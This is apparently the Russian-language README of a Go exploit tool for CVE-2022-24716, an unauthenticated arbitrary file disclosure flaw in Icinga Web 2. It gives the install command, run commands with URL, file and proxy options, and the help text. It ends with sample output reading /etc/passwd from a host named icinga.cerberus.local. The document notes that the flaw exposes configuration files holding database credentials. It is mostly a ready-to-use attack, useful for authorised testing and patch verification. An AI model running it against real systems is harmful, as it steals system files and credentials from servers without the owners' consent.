
CVE-2022-24716 (Произвольное раскрытие файлов Icingaweb2)
Icinga Web 2 — это веб-интерфейс, фреймворк и интерфейс командной строки для мониторинга с открытым исходным кодом. Неаутентифицированные пользователи могут раскрыть содержимое доступных пользователю локальных системных файлов с веб-сервера, включая файлы конфигурации icingaweb2 с учетными данными базы данных.
Для CVE-2022-24716 требуется golang; чтобы загрузить его, просто используйте:
go install -v github.com/joaoviictorti/CVE-2022-24716@latest
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080
Это покажет справку по инструменту. Вот все параметры, которые он поддерживает:
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
[-p|--proxy "<value>"]
CVE-2022-24716 - Arbitrary File Disclosure
Arguments:
-h --help Print help information
-u --url Insert url
-f --file Insert file
-p --proxy Insert proxy
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......